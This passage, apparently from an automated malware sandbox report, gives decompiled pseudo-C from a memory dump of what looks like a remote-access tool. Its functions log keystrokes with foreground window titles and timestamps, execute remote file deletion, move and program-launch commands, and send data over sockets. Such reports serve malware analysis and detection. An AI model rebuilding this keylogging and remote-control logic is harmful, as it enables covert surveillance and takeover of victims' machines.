				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4f06680 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E04EE94DA(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4f06680 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4f06680 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x4f06680 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E04EEAC1D( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E04EEAC1D();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E04ED572E(_v8 ^ _t136);
			}


































                                                                                    0x04eee9b6
                                                                                    0x04eee9bd
                                                                                    0x04eee9c0
                                                                                    0x04eee9c8
                                                                                    0x04eee9cc
                                                                                    0x04eee9d8
                                                                                    0x04eee9db
                                                                                    0x04eee9de
                                                                                    0x04eee9e5
                                                                                    0x04eee9ed
                                                                                    0x04eee9f0
                                                                                    0x04eee9f6
                                                                                    0x04eee9fc
                                                                                    0x04eeea01
                                                                                    0x04eeea03
                                                                                    0x04eeea06
                                                                                    0x04eeea0b
                                                                                    0x04eeea15
                                                                                    0x04eeea1c
                                                                                    0x04eeea1f
                                                                                    0x04eeea26
                                                                                    0x04eeea2d
                                                                                    0x04eeea59
                                                                                    0x04eeea7f
                                                                                    0x04eeea81
                                                                                    0x00000000
                                                                                    0x04eeea5b
                                                                                    0x04eeea5e
                                                                                    0x04eeeb25
                                                                                    0x04eeeb31
                                                                                    0x04eeeb3c
                                                                                    0x04eeeb41
                                                                                    0x04eeea64
                                                                                    0x04eeea6b
                                                                                    0x04eeea70
                                                                                    0x04eeea76
                                                                                    0x04eeea7c
                                                                                    0x00000000
                                                                                    0x04eeea7c
                                                                                    0x04eeea76
                                                                                    0x04eeea5e
                                                                                    0x04eeea2f
                                                                                    0x04eeea33
                                                                                    0x04eeea36
                                                                                    0x04eeea3c
                                                                                    0x04eeea3e
                                                                                    0x04eeea41
                                                                                    0x04eeea45
                                                                                    0x04eeea82
                                                                                    0x04eeea85
                                                                                    0x04eeea86
                                                                                    0x04eeea8b
                                                                                    0x04eeea91
                                                                                    0x04eeea97
                                                                                    0x04eeeaa6
                                                                                    0x04eeeaac
                                                                                    0x04eeeab2
                                                                                    0x04eeeab7
                                                                                    0x04eeead3
                                                                                    0x04eeeb46
                                                                                    0x04eeeb4c
                                                                                    0x04eeead5
                                                                                    0x04eeeadd
                                                                                    0x04eeeae6
                                                                                    0x04eeeaec
                                                                                    0x00000000
                                                                                    0x04eeeaee
                                                                                    0x04eeeaf0
                                                                                    0x04eeeaf3
                                                                                    0x04eeeb0c
                                                                                    0x00000000
                                                                                    0x04eeeb0e
                                                                                    0x04eeeb12
                                                                                    0x04eeeb14
                                                                                    0x04eeeb17
                                                                                    0x00000000
                                                                                    0x04eeeb17
                                                                                    0x04eeeb12
                                                                                    0x04eeeb0c
                                                                                    0x04eeeaec
                                                                                    0x04eeeae6
                                                                                    0x04eeead3
                                                                                    0x04eeeab7
                                                                                    0x04eeea91
                                                                                    0x00000000
                                                                                    0x04eeeb1a
                                                                                    0x04eeeb1a
                                                                                    0x04eeeb4e
                                                                                    0x04eeeb60

                                                                                    APIs
                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,04EEF123,?,00000000,?,00000000,00000000), ref: 04EEE9F0
                                                                                    • __fassign.LIBCMT ref: 04EEEA6B
                                                                                    • __fassign.LIBCMT ref: 04EEEA86
                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 04EEEAAC
                                                                                    • WriteFile.KERNEL32(?,?,00000000,04EEF123,00000000,?,?,?,?,?,?,?,?,?,04EEF123,?), ref: 04EEEACB
                                                                                    • WriteFile.KERNEL32(?,?,00000001,04EEF123,00000000,?,?,?,?,?,?,?,?,?,04EEF123,?), ref: 04EEEB04
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1324828854-0
                                                                                    • Opcode ID: 0e2b31c79038847ef5e4aededf2eb2140f327802e82b00d6ab06a7d576cb38ac
                                                                                    • Instruction ID: 18187b509093c2a5c1bc6e7bd5f25ad33c6114fbde171f7aa90b20c5f4fa7b91
                                                                                    • Opcode Fuzzy Hash: 0e2b31c79038847ef5e4aededf2eb2140f327802e82b00d6ab06a7d576cb38ac
                                                                                    • Instruction Fuzzy Hash: D151C270A00249AFDB20CFA9D885AFEFBF8FF49300F14555AE956E7241E730A940CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED41B0, Relevance: 10.6, APIs: 7, Instructions: 142memorynetworkCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 63%
                                                                                    			E04ED41B0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				long _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void** _v32;
				signed int _t53;
				intOrPtr _t56;
				long _t61;
				long* _t68;
				long _t71;
				long _t87;
				intOrPtr _t90;
				void** _t100;
				void* _t101;
				long* _t104;
				void* _t106;
				void* _t108;
				signed int _t109;
				void* _t110;

				_t90 = __ecx;
				_t53 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t53 ^ _t109;
				_v20 = _a8;
				_t56 = _a12;
				_v24 = __ecx;
				_v28 = _a4;
				if(_t56 <= 0) {
					return E04ED572E(_v8 ^ _t109);
				} else {
					_t100 = __ecx + 0x94;
					_v32 = _t100;
					do {
						_v16 = 0;
						_t87 =  <  ? _t56 :  *((intOrPtr*)(_t90 + 0x18));
						_v12 = _t87;
						if(E04ECC4C0( &(_t100[7]),  &_v16) != 0) {
							_t101 = _v16;
						} else {
							_t108 = _t100[4];
							_t101 = HeapAlloc( *_t100, 0, _t108 + 0x38);
							_v16 = _t101;
							 *(_t101 + 0x14) = _v32;
							_t20 = _t101 + 0x38; // 0x38
							 *(_t101 + 0x24) = _t108;
							 *((intOrPtr*)(_t101 + 0x20)) = _t20;
						}
						_t24 = _t101 + 0x1c; // 0x1c
						_t104 = _t24;
						asm("xorps xmm0, xmm0");
						asm("movups [edi], xmm0");
						 *(_t101 + 0x10) = 0;
						 *_t104 = 0;
						if(_t87 >= 0) {
							_t61 = _v12;
						} else {
							_t61 =  *(_v24 + 0x18);
						}
						 *_t104 = _t61;
						E04EDDC90( *((intOrPtr*)(_t101 + 0x20)), _v20, _t87);
						_t110 = _t110 + 0xc;
						InterlockedExchangeAdd(_v28 + 0x40, _t87);
						 *((intOrPtr*)(_t101 + 0x34)) =  *((intOrPtr*)(_v28 + 0x88));
						_t68 =  &_v12;
						_v12 = 0;
						 *((intOrPtr*)(_t101 + 0x18)) = 3;
						 *(_t101 + 0x28) = 2;
						__imp__WSASend( *((intOrPtr*)(_t101 + 0x34)), _t104, 1, _t68, 0, _t101, 0);
						if(_t68 != 0xffffffff) {
							_t68 = 0;
						} else {
							__imp__#111();
						}
						_t106 =  !=  ? _t68 : 0;
						_t40 = _t101 + 0x28; // 0x28
						if(InterlockedDecrement(_t40) == 0 || _t106 != 0) {
							_t71 = E04ECC570(_v24 + 0xb0, _t101);
							if(_t71 == 0) {
								HeapFree( *( *(_t101 + 0x14)), _t71, _t101);
							}
							if(_t106 != 0) {
								InterlockedExchangeAdd(_v28 + 0x40,  ~_t87);
							} else {
								goto L16;
							}
						} else {
							goto L16;
						}
						break;
						L16:
						_t90 = _v24;
						_t56 = _a12 - _t87;
						_v20 = _v20 + _t87;
						_a12 = _t56;
						_t100 = _t90 + 0x94;
					} while (_t56 > 0);
					return E04ED572E(_v8 ^ _t109);
				}
			}
























                                                                                    0x04ed41b0
                                                                                    0x04ed41b6
                                                                                    0x04ed41bd
                                                                                    0x04ed41c6
                                                                                    0x04ed41c9
                                                                                    0x04ed41cc
                                                                                    0x04ed41cf
                                                                                    0x04ed41d4
                                                                                    0x04ed434d
                                                                                    0x04ed41da
                                                                                    0x04ed41db
                                                                                    0x04ed41e2
                                                                                    0x04ed41e6
                                                                                    0x04ed41ee
                                                                                    0x04ed41f5
                                                                                    0x04ed41fc
                                                                                    0x04ed4206
                                                                                    0x04ed422f
                                                                                    0x04ed4208
                                                                                    0x04ed4208
                                                                                    0x04ed4219
                                                                                    0x04ed421e
                                                                                    0x04ed4221
                                                                                    0x04ed4224
                                                                                    0x04ed4227
                                                                                    0x04ed422a
                                                                                    0x04ed422a
                                                                                    0x04ed4232
                                                                                    0x04ed4232
                                                                                    0x04ed4235
                                                                                    0x04ed4238
                                                                                    0x04ed423b
                                                                                    0x04ed4242
                                                                                    0x04ed424a
                                                                                    0x04ed4254
                                                                                    0x04ed424c
                                                                                    0x04ed424f
                                                                                    0x04ed424f
                                                                                    0x04ed425b
                                                                                    0x04ed4260
                                                                                    0x04ed4268
                                                                                    0x04ed4270
                                                                                    0x04ed4284
                                                                                    0x04ed4287
                                                                                    0x04ed4291
                                                                                    0x04ed4298
                                                                                    0x04ed429f
                                                                                    0x04ed42a6
                                                                                    0x04ed42af
                                                                                    0x04ed42b9
                                                                                    0x04ed42b1
                                                                                    0x04ed42b1
                                                                                    0x04ed42b1
                                                                                    0x04ed42c2
                                                                                    0x04ed42c5
                                                                                    0x04ed42d1
                                                                                    0x04ed42e1
                                                                                    0x04ed42e8
                                                                                    0x04ed42f1
                                                                                    0x04ed42f1
                                                                                    0x04ed42f9
                                                                                    0x04ed4336
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed42fb
                                                                                    0x04ed42fe
                                                                                    0x04ed4301
                                                                                    0x04ed4303
                                                                                    0x04ed4306
                                                                                    0x04ed4309
                                                                                    0x04ed430f
                                                                                    0x04ed4329
                                                                                    0x04ed4329

                                                                                    APIs
                                                                                    • HeapAlloc.KERNEL32(?,00000000,?,00000000,00000000,?,?), ref: 04ED4213
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,?), ref: 04ED4270
                                                                                    • WSASend.WS2_32(?,0000001C,00000001,?), ref: 04ED42A6
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED42B1
                                                                                    • InterlockedDecrement.KERNEL32(00000028), ref: 04ED42C9
                                                                                    • HeapFree.KERNEL32(?,00000000,00000000,00000000), ref: 04ED42F1
                                                                                    • InterlockedExchangeAdd.KERNEL32(-0000003D,?), ref: 04ED4336
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$ExchangeHeap$AllocDecrementErrorFreeLastSend
                                                                                    • String ID:
                                                                                    • API String ID: 1875204869-0
                                                                                    • Opcode ID: e29a916e7e27c0f7706aa32be9466289bbdc611f4a96be5f5c591bfcfd416670
                                                                                    • Instruction ID: 4ede6eb2095655d7dfaeaa280f61bdd7cc6bcad93e33afb5691f7faf1882f819
                                                                                    • Opcode Fuzzy Hash: e29a916e7e27c0f7706aa32be9466289bbdc611f4a96be5f5c591bfcfd416670
                                                                                    • Instruction Fuzzy Hash: 3B513D71A0020AEFDB10CFA5D984BAABBB8FF58304F105629E905E7640E774F956CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBB2C0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136stringtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E04EBB2C0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				short _v532;
				short _v2580;
				struct _SYSTEMTIME _v2596;
				struct HWND__* _v2600;
				signed int _t35;
				intOrPtr _t38;
				struct HWND__* _t39;
				signed int _t43;
				intOrPtr _t45;
				intOrPtr* _t50;
				signed int _t67;
				signed int _t68;
				WCHAR* _t70;
				void* _t74;
				signed short* _t76;
				intOrPtr* _t77;
				intOrPtr* _t82;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				intOrPtr* _t91;
				signed int _t93;
				signed int _t94;
				void* _t95;

				_t35 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t35 ^ _t94;
				_t70 = __ecx;
				if(__ecx == 0) {
					L24:
					return E04ED572E(_v8 ^ _t94);
				}
				_t91 = __ecx;
				_t74 = __ecx + 2;
				do {
					_t38 =  *_t91;
					_t91 = _t91 + 2;
				} while (_t38 != 0);
				_t93 = _t91 - _t74 >> 1;
				if(_t93 < 1) {
					goto L24;
				}
				_t39 = GetForegroundWindow();
				_v2600 = _t39;
				GetWindowTextW(_t39,  &_v532, 0x101);
				_t89 =  *0x4f06adc; // 0x0
				if(_v2600 !=  *(_t89 + 8)) {
					L13:
					_t76 =  &_v532;
					_t12 = _t89 + 0xc; // 0xc
					_t84 = _t12 - _t76;
					asm("o16 nop [eax+eax]");
					do {
						_t43 =  *_t76 & 0x0000ffff;
						_t76 =  &(_t76[1]);
						 *(_t84 + _t76 - 2) = _t43;
					} while (_t43 != 0);
					_t77 =  &_v532;
					 *(_t89 + 8) = _v2600;
					_t85 = _t77 + 2;
					do {
						_t45 =  *_t77;
						_t77 = _t77 + 2;
					} while (_t45 != 0);
					if(_t77 != _t85) {
						E04EDDAD0(_t89,  &_v2580, 0, 0x800);
						GetLocalTime( &_v2596);
						wsprintfW( &_v2580, L"\r\n\r\n[Title:%s]\r\n[Time:]%d-%d-%d  %d:%d:%d\r\n[Content:]",  &_v532, _v2596.wYear & 0x0000ffff, _v2596.wMonth & 0x0000ffff, _v2596.wDay & 0x0000ffff, _v2596.wHour & 0x0000ffff, _v2596.wMinute & 0x0000ffff, _v2596.wSecond & 0x0000ffff);
						_t95 = _t95 + 0x30;
						E04EBB2C0(_t70,  &_v2580, _t89, _t93);
						_t89 =  *0x4f06adc; // 0x0
					}
					L19:
					if( *((char*)(_t89 + 0x20c)) != 0) {
						E04EBB180(_t70);
						_t89 =  *0x4f06adc; // 0x0
					}
					if( *_t89 + _t93 > 0x400) {
						_t32 = _t89 + 0x416; // 0x416
						E04EDDAD0(_t89, _t32, 0, 0x800);
						 *_t89 = 0;
					}
					_t33 = _t89 + 0x416; // 0x416
					lstrcatW(_t33, _t70);
					_t50 =  *0x4f06adc; // 0x0
					 *_t50 =  *_t50 + _t93;
					goto L24;
				}
				_t82 =  &_v532;
				_t8 = _t89 + 0xc; // 0xc
				_t67 = _t8;
				while(1) {
					_t86 =  *_t67;
					if(_t86 !=  *_t82) {
						break;
					}
					if(_t86 == 0) {
						L10:
						_t68 = 0;
						L12:
						if(_t68 == 0) {
							goto L19;
						}
						goto L13;
					}
					_t87 =  *((intOrPtr*)(_t67 + 2));
					if(_t87 !=  *((intOrPtr*)(_t82 + 2))) {
						break;
					}
					_t67 = _t67 + 4;
					_t82 = _t82 + 4;
					if(_t87 != 0) {
						continue;
					}
					goto L10;
				}
				asm("sbb eax, eax");
				_t68 = _t67 | 0x00000001;
				goto L12;
			}






























                                                                                    0x04ebb2c9
                                                                                    0x04ebb2d0
                                                                                    0x04ebb2d4
                                                                                    0x04ebb2da
                                                                                    0x04ebb489
                                                                                    0x04ebb499
                                                                                    0x04ebb499
                                                                                    0x04ebb2e0
                                                                                    0x04ebb2e2
                                                                                    0x04ebb2e5
                                                                                    0x04ebb2e5
                                                                                    0x04ebb2e8
                                                                                    0x04ebb2eb
                                                                                    0x04ebb2f2
                                                                                    0x04ebb2f7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebb2fd
                                                                                    0x04ebb30e
                                                                                    0x04ebb316
                                                                                    0x04ebb31c
                                                                                    0x04ebb32b
                                                                                    0x04ebb369
                                                                                    0x04ebb369
                                                                                    0x04ebb36f
                                                                                    0x04ebb374
                                                                                    0x04ebb376
                                                                                    0x04ebb380
                                                                                    0x04ebb380
                                                                                    0x04ebb383
                                                                                    0x04ebb386
                                                                                    0x04ebb38b
                                                                                    0x04ebb396
                                                                                    0x04ebb39c
                                                                                    0x04ebb39f
                                                                                    0x04ebb3a2
                                                                                    0x04ebb3a2
                                                                                    0x04ebb3a5
                                                                                    0x04ebb3a8
                                                                                    0x04ebb3b1
                                                                                    0x04ebb3c5
                                                                                    0x04ebb3d4
                                                                                    0x04ebb41d
                                                                                    0x04ebb423
                                                                                    0x04ebb42c
                                                                                    0x04ebb431
                                                                                    0x04ebb431
                                                                                    0x04ebb437
                                                                                    0x04ebb43e
                                                                                    0x04ebb442
                                                                                    0x04ebb447
                                                                                    0x04ebb447
                                                                                    0x04ebb456
                                                                                    0x04ebb45d
                                                                                    0x04ebb466
                                                                                    0x04ebb46e
                                                                                    0x04ebb46e
                                                                                    0x04ebb475
                                                                                    0x04ebb47c
                                                                                    0x04ebb482
                                                                                    0x04ebb487
                                                                                    0x00000000
                                                                                    0x04ebb487
                                                                                    0x04ebb32d
                                                                                    0x04ebb333
                                                                                    0x04ebb333
                                                                                    0x04ebb336
                                                                                    0x04ebb336
                                                                                    0x04ebb33c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebb341
                                                                                    0x04ebb358
                                                                                    0x04ebb358
                                                                                    0x04ebb361
                                                                                    0x04ebb363
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebb363
                                                                                    0x04ebb343
                                                                                    0x04ebb34b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebb34d
                                                                                    0x04ebb350
                                                                                    0x04ebb356
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebb356
                                                                                    0x04ebb35c
                                                                                    0x04ebb35e
                                                                                    0x00000000

                                                                                    APIs
                                                                                    Strings
                                                                                    • [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:], xrefs: 04EBB417
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
                                                                                    • String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
                                                                                    • API String ID: 67575802-2837871436
                                                                                    • Opcode ID: d31112d61aad802f34b9bf1f8990e883614b7c9fa61da4ea745a011da6d8f986
                                                                                    • Instruction ID: 392ff58362e9ee52199042fce1a40d816fb4032844432cd979c0e1da4d618f9f
                                                                                    • Opcode Fuzzy Hash: d31112d61aad802f34b9bf1f8990e883614b7c9fa61da4ea745a011da6d8f986
                                                                                    • Instruction Fuzzy Hash: CD51B071A002199EDB24DF54DC84BFAB3B8FB18308F4455A9E94AE7940E775BA84CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB4130, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filestringCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 60%
                                                                                    			E04EB4130(void* __ebx, void* __ecx, signed char* _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				signed int _t26;

				_t26 = ( *_a4 & 0x000000ff) + 0xfffffffb;
				if(_t26 > 0xe) {
					L19:
					return _t26;
				} else {
					switch( *((intOrPtr*)(_t26 * 4 +  &M04EB4268))) {
						case 0:
							return E04EB4C20(__ebx, __ecx, __ecx, _t36, _t31 + 1);
							goto L20;
						case 1:
							__eax = __edx + 1;
							__eax = E04EB52C0(__ebx, __ecx, __edi, __edx + 1);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L20;
						case 2:
							__eax = __edx + 1;
							__eax = E04EB56D0(__ebx, __ecx, __edi, __esi, __edx + 1);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L20;
						case 3:
							_a8 = _a8 - 1;
							__eflags = _a8 - 1;
							__eax = __edx + 1;
							__eax = E04EB5910(__ebx, __ecx, __edi, __esi, __edx + 1, __edx + 1);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L20;
						case 4:
							goto L19;
						case 5:
							__eax = __edx + 1;
							__eax = E04EB50B0(__ecx, __edx + 1);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L20;
						case 6:
							__eax = E04EB56A0(__ecx);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L20;
						case 7:
							__edx + 1 = DeleteFileW(__edx + 1);
							goto L4;
						case 8:
							__edx + 1 = E04EB4E30(__ebx, __ecx, __edi, __esi, __edx + 1);
							L4:
							_v8 = 0x6d;
							goto L5;
						case 9:
							__eax =  *(__edx + 1);
							 *(__edi + 0x14) =  *(__edx + 1);
							__eax = E04EB57F0(__ebx, __ecx, __edi, __esi);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L20;
						case 0xa:
							__edx + 1 = E04EB4670(__ecx, __eflags, __edx + 1);
							_v12 = 0x70;
							goto L5;
						case 0xb:
							__esi = __edx + 1;
							__eax = lstrlenW(__esi);
							__eax =  &(__eax[0]);
							__eax = MoveFileW(__esi, __eax);
							_v8 = 0x72;
							L5:
							_push(__ecx);
							__ecx =  *((intOrPtr*)(__edi + 4));
							__eax =  &_v8;
							_push(0x3f);
							_push(1);
							_push( &_v8);
							__eax = E04EB1C60( *((intOrPtr*)(__edi + 4)));
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L20;
						case 0xc:
							_push(5);
							goto L16;
						case 0xd:
							_push(0);
							L16:
							__eax = __edx + 1;
							__eax = ShellExecuteW(0, L"open", __edx + 1, 0, 0, ??);
							_pop(__edi);
							_pop(__esi);
							return __eax;
							goto L20;
						case 0xe:
							__edx + 1 = E04EB45E0(__ecx, __edx + 1);
							goto L19;
					}
				}
				L20:
			}






                                                                                    0x04eb4140
                                                                                    0x04eb4149
                                                                                    0x04eb425d
                                                                                    0x04eb4262
                                                                                    0x04eb414f
                                                                                    0x04eb414f
                                                                                    0x00000000
                                                                                    0x04eb4164
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb419b
                                                                                    0x04eb419f
                                                                                    0x04eb41a4
                                                                                    0x04eb41a5
                                                                                    0x04eb41a9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb420a
                                                                                    0x04eb420e
                                                                                    0x04eb4213
                                                                                    0x04eb4214
                                                                                    0x04eb4218
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb421e
                                                                                    0x04eb421e
                                                                                    0x04eb4220
                                                                                    0x04eb4224
                                                                                    0x04eb4229
                                                                                    0x04eb422a
                                                                                    0x04eb422e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb41ac
                                                                                    0x04eb41b0
                                                                                    0x04eb41b5
                                                                                    0x04eb41b6
                                                                                    0x04eb41ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb41ea
                                                                                    0x04eb41ef
                                                                                    0x04eb41f0
                                                                                    0x04eb41f4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb416b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4194
                                                                                    0x04eb4171
                                                                                    0x04eb4171
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb41f7
                                                                                    0x04eb41fa
                                                                                    0x04eb41fd
                                                                                    0x04eb4202
                                                                                    0x04eb4203
                                                                                    0x04eb4207
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb41c1
                                                                                    0x04eb41c6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb41cd
                                                                                    0x04eb41d1
                                                                                    0x04eb41d7
                                                                                    0x04eb41dd
                                                                                    0x04eb41e3
                                                                                    0x04eb4176
                                                                                    0x04eb4176
                                                                                    0x04eb4177
                                                                                    0x04eb417a
                                                                                    0x04eb417e
                                                                                    0x04eb4180
                                                                                    0x04eb4182
                                                                                    0x04eb4183
                                                                                    0x04eb4188
                                                                                    0x04eb4189
                                                                                    0x04eb418d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4231
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4250
                                                                                    0x04eb4233
                                                                                    0x04eb4237
                                                                                    0x04eb4242
                                                                                    0x04eb4248
                                                                                    0x04eb4249
                                                                                    0x04eb424d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb4258
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04eb414f
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(?), ref: 04EB416B
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?), ref: 04EB41D1
                                                                                    • MoveFileW.KERNEL32(?,00000001), ref: 04EB41DD
                                                                                    • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 04EB4242
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$DeleteExecuteMoveShelllstrlen
                                                                                    • String ID: open$r
                                                                                    • API String ID: 69973834-2967530574
                                                                                    • Opcode ID: 55db47fef8b5e88345e3fd3d9d09beeb40f7b1314e68e76e5bb3ca07f6475e80
                                                                                    • Instruction ID: 20bc27cdff3f16aca9cc2fc6171ee0e2cb071e0b564a0dfa3b34ec85c909bcc8
                                                                                    • Opcode Fuzzy Hash: 55db47fef8b5e88345e3fd3d9d09beeb40f7b1314e68e76e5bb3ca07f6475e80
                                                                                    • Instruction Fuzzy Hash: 1B31B637608109A6D200EF98F845FEBF39CEBD9225F0087A7EE44C7181DA66F55487E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBB180, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 82%
                                                                                    			E04EBB180(intOrPtr* __ecx) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				void* _v24;
				void* __esi;
				intOrPtr _t21;
				intOrPtr _t25;
				signed char _t31;
				signed int _t36;
				void* _t37;
				void* _t41;
				long _t42;
				intOrPtr* _t46;
				void* _t49;
				void* _t51;
				void* _t53;
				void* _t54;
				void* _t55;
				intOrPtr* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t62;

				_t21 =  *0x4f06adc; // 0x0
				_t56 = __ecx;
				_t41 = CreateFileW(_t21 + 0x20e, 0x40000000, 2, 0, 4, 0x80, 0);
				_v20 = 0;
				_v24 = _t41;
				if(GetFileSize(_t41, 0) < 0x3200000) {
					SetFilePointer(_t41, 0, 0, 2);
				}
				_t46 = _t56;
				_t54 = _t46 + 2;
				do {
					_t25 =  *_t46;
					_t46 = _t46 + 2;
					_t68 = _t25;
				} while (_t25 != 0);
				_t48 = _t46 - _t54 >> 1;
				_t42 = (_t46 - _t54 >> 1) + (_t46 - _t54 >> 1);
				_push(_t42);
				_v12 = _t42;
				_t60 = E04ED5785(_t48, _t59, _t68);
				_t55 = 0;
				_v8 = _t60;
				if(_t42 > 0) {
					if(_t42 >= 0x20) {
						_t8 = _t60 - 1; // -1
						_t51 = _t8 + _t42;
						if(_t60 > _t56 - 1 + _t42 || _t51 < _t56) {
							_t36 = _t42 & 0x8000001f;
